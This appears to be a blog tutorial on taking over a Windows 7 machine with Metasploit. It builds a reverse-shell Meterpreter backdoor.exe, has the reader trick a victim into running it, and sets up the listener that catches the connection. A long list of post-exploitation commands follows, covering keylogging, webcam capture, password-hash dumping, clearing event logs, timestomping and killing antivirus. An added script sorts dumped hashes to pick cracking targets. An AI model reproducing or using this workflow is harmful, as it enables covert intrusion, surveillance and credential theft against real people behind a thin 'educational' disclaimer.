Friday 15 November 2013

Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands

This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!

(The text version comes first, then the video of this tutorial, and after the video a list of Meterpreter commands.)


Requirements:
             1. Kali Linux/BackTrack
             2. Metasploit Framework

Steps:
      1. Open a terminal and type " service postgresql start && service metasploit start " (without the quotation marks). This starts the PostgreSQL database Metasploit uses for its workspace and the Metasploit service itself. On current Kali releases there is no metasploit service any more: run " msfdb init " once instead and then start msfconsole.

2. Now we need to create a payload for the victim machine. The command for creating the payload is:

msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 X > /root/backdoor.exe

The X at the end selects executable (.exe) output and the redirect writes it to /root/backdoor.exe. (msfpayload was removed from Metasploit in 2015; on a current install use msfvenom, which takes the same payload name and LHOST/LPORT options and writes an executable with -f exe -o <path>.)

After LHOST= enter your IP address (to get it, open a terminal and type ifconfig). This must be an address the victim can actually reach: on the same LAN it is the address of your Kali interface; across the internet it is the public/NAT address the connection will arrive at, with LPORT forwarded to your Kali box.


3. Use your social-engineering skills to get the payload (backdoor.exe) run on the victim machine. Set up the listener in steps 4 to 6 first, so it is already waiting when the payload executes.


4. Set up the listener that backdoor.exe will connect back to. Do this before the payload runs on the victim: the reverse_tcp stager connects out the moment it executes, and if nothing is listening on LHOST:LPORT you get no session.


5. Open a terminal and type " service postgresql start && service metasploit start " (without the quotation marks) if you did not already do so in step 1.


6. Type ' msfconsole ' and, at the msf > prompt, type the following:


use exploit/multi/handler (press enter)

set payload windows/meterpreter/reverse_tcp (press enter)
set lhost <the IP you provided while creating the payload> (press enter)
set lport 4444 (press enter)
exploit

The payload, lhost and lport must match exactly what you gave msfpayload in step 2; with a different port or payload type the connection either never arrives or fails while staging.
      



Once the payload runs on the victim and connects back, the handler prints "Meterpreter session 1 opened" and you land at a meterpreter > prompt, as shown below:



      

Video: 





Meterpreter Commands:

1. sysinfo -----> shows the target's computer name, OS version and build, architecture (x86 or x64), system language and domain.

2. run checkvm ------> runs the checkvm script to determine whether the target is a virtual machine (VMware, VirtualBox, Hyper-V, Xen and others) or physical hardware.

3. route --------> dumps the target's routing table to the screen and shows how its subnets are configured; it can also add or delete routes on the target.

4. run get_application_list -------> lists the applications installed on the remote PC.

5. uictl ---------> enables or disables user-interface components on the target (the keyboard and the mouse).

6. idletime -----> shows how long the user on the target has been idle (no keyboard or mouse input).

7. getpid ---------> shows the PID of the process Meterpreter is currently running in.

8. getuid -------> shows the user Meterpreter is running as, for example NT AUTHORITY\SYSTEM or a domain or local account.

9. ps ------> lists all processes running on the target with their PIDs, architecture and owning user.

10. run get_env -------> dumps the target's environment variables, which reveal paths, user names and similar details.

11. ifconfig and ipconfig -----> show the IP address of each network interface and how many adapters are enabled (the two are aliases).

12. ? ------> shows the list of available commands (same as help).

13. getsystem -----> attempts to elevate to NT AUTHORITY\SYSTEM using several built-in techniques (named-pipe impersonation, token duplication). All of them need administrative rights, so on Windows 7 it only succeeds from a UAC-elevated process; from a standard user session you must escalate or bypass UAC first.

14. reboot ------> reboots the remote machine.

15. sc config service_name start= disabled --------> not a Meterpreter command but a Windows command to run from a shell on the target: it stops the named service from starting at the next reboot (the space after start= is required). "service_name" is the service you want to disable.

16. clearev -------> wipes the Application, System and Security event logs on the target. Clearing a log is itself logged: Windows writes event 1102 (Security) or 104 (System) saying the log was cleared, which defenders alert on.

17. execute -f cmd.exe -H -c ------> starts cmd.exe on the target with a hidden window (-H) and attaches it to a channel (-c) so you can interact with it.

18. interact 1 ------> interacts with a channel; replace "1" with the number of the channel you want to interact with.

19. download -------> downloads the specified file from the target. "Example" download c:\\boot.ini

20. upload --------> uploads files to the victim machine.

21. portfwd ------> forwards a local port through the session to a service on or behind the target.

22. run getgui -e ------> enables Remote Desktop on the victim.

23. run gettelnet -e -------> enables Telnet on the remote machine.

24. run getcountermeasure ------> checks the security configuration of the exploited machine (firewall rules, antivirus) and can disable countermeasures such as the firewall.

25. run killav -------> tries to kill most antivirus products that run as a service on the exploited machine. Works on some but not all AVs.

26. run get_local_subnets ------> shows the local subnets of the victim machine.

27. run hostedit -------> adds entries to the Windows hosts file. Because Windows consults the hosts file before DNS, this diverts traffic for a host name to an address of your choosing.

28. run remotewinenum -------> enumerates a target system with the wmic command.


29. run winenum -------> general system enumeration: dumps tokens and hashes and runs a set of net and wmic commands, saving the output in the Metasploit logs directory.

30. run scraper --------> grabs additional system information the other enumeration scripts do not, such as a dump of the entire registry.

31. migrate --------> migrates Meterpreter into another process such as explorer.exe so you don't lose the session when the process you started in (backdoor.exe) exits or is killed.

32. cat -------> prints the contents of a file to the screen.

33. background (or Ctrl+Z) --------> backgrounds the current session and returns you to the msf > prompt.

34. irb -------> drops into an interactive Ruby shell with the session object available for scripting.

35. interact --------> interacts with a channel.

36. load ------> loads one or more Meterpreter extensions.

37. channel -------> displays information about active channels.

38. bgkill ---------> kills a background Meterpreter script.

39. close --------> closes a channel.

40. enumdesktops --------> lists all accessible desktops and window stations.

41. getdesktop -------> shows the desktop Meterpreter is currently attached to.

42. lpwd --------> prints the local (attacker-side) working directory.

43. ls --------> lists files in the current directory on the target.

44. rm --------> deletes the specified file.

45. search --------> searches for files on the target.

46. upload ------> uploads a file to the target.

47. keyscan_start --------> starts capturing keystrokes.

48. keyscan_stop --------> stops capturing keystrokes.

49. keyscan_dump --------> dumps the keystrokes captured so far. The keylogger only sees input to the desktop of the process you are in, so migrate into the logged-on user's explorer.exe first to capture what that user types.


50. screenshot --------> takes a screenshot of the target's GUI.

51. setdesktop ---------> changes Meterpreter's current desktop.

52. getprivs ---------> attempts to enable all privileges available to the current process.

53. kill --------> terminates a process by PID. "Example" kill 1834

54. reboot --------> reboots the remote computer.

55. reg ---------> interacts with the remote registry (query, create, set and delete keys and values).

56. rev2self ---------> calls RevertToSelf() on the remote machine, dropping any impersonated token and returning to the process's original identity.

57. shell --------> drops into a system command shell (cmd.exe) on the target.

58. shutdown --------> shuts down the remote computer.

59. steal_token ------> attempts to steal an impersonation token from the specified process, so that you act as that process's user.

60. webcam_list --------> lists webcams.

61. webcam_snap -------> takes a snapshot from the specified webcam.

62. hashdump --------> dumps the contents of the SAM database (user names, RIDs and LM/NT password hashes). Requires SYSTEM privileges, so run getsystem first.

63. timestomp -------> manipulates the MACE attributes (Modified, Accessed, Created, Entry-modified) of a file to hide when it was written.

64. execute ------> executes a command on the target.

65. info --------> displays information about the active post module.

66. quit --------> terminates the Meterpreter session.

67. getwd -------> prints the working directory on the target.

68. mkdir -------> makes a directory.

69. pwd -------> prints the working directory (same as getwd).

70. drop_token -------> relinquishes any active impersonation token.

71. rmdir --------> removes a directory.

72. del -------> deletes a file. "Example" del passwords.txt
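The hashdump output (item 62, obtained after getsystem from item 13) is only useful once you know which entries are worth cracking. The script below is an added example, not part of the original post: it parses hashdump lines of the form user:RID:LM-hash:NT-hash::: and flags accounts whose NT hash is the well-known empty-password value and accounts that still have a real LM hash stored (LM hashes are cheap to crack because they are case-insensitive and split into two 7-character halves). The sample lines are constructed for the example; the non-empty hash values are placeholders, not credentials from any real system, and the function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the original post): triage Meterpreter hashdump
# output.  Each line is  user:RID:LM-hash:NT-hash:::  The sample below is
# constructed for this example; the non-empty hashes are placeholders.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::'

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty password
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# Read hashdump lines on stdin and print one tab-separated triage line per
# account (user, RID, class).  Lines that are not hash records, such as the
# "[*] Obtaining the boot key..." status messages, are skipped.
#   empty-password : NT hash equals the empty-password constant
#   lm-stored      : a real LM hash is present (crack this one first)
#   nt-only        : only the NT hash is usable
triage_hashdump() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF >= 4 && $2 ~ /^[0-9]+$/ {
            user = $1; rid = $2; lm = tolower($3); nt = tolower($4)
            if (nt == ent)      cls = "empty-password"
            else if (lm != elm) cls = "lm-stored"
            else                cls = "nt-only"
            printf "%s\t%s\t%s\n", user, rid, cls
        }'
}

# Just the user names that can be logged into with an empty password.
empty_password_users() {
    triage_hashdump | awk -F'\t' '$3 == "empty-password" { print $1 }'
}

# Usage: sh triage.sh hashdump.txt   (text copied from the meterpreter
# session).  With HASHDUMP_DEMO=1 and no file, the constructed sample is used.
if [ -n "${1:-}" ]; then
    triage_hashdump < "$1"
elif [ "${HASHDUMP_DEMO:-0}" = 1 ]; then
    printf '%s\n' "$SAMPLE_HASHDUMP" | triage_hashdump
fi
```

Hash comparison is done case-insensitively because different dumpers emit upper- or lower-case hex. On a Windows 7 target LM storage is disabled by default, so most accounts come out as nt-only; an lm-stored entry usually means a password set before that policy applied or a deliberately weakened configuration.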

2 comments:

  1. We will be getting a reverse TCP connection from the victim machine by using a small backdoor Windows 7 exploit Metasploit.

  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using Metasploit on Windows.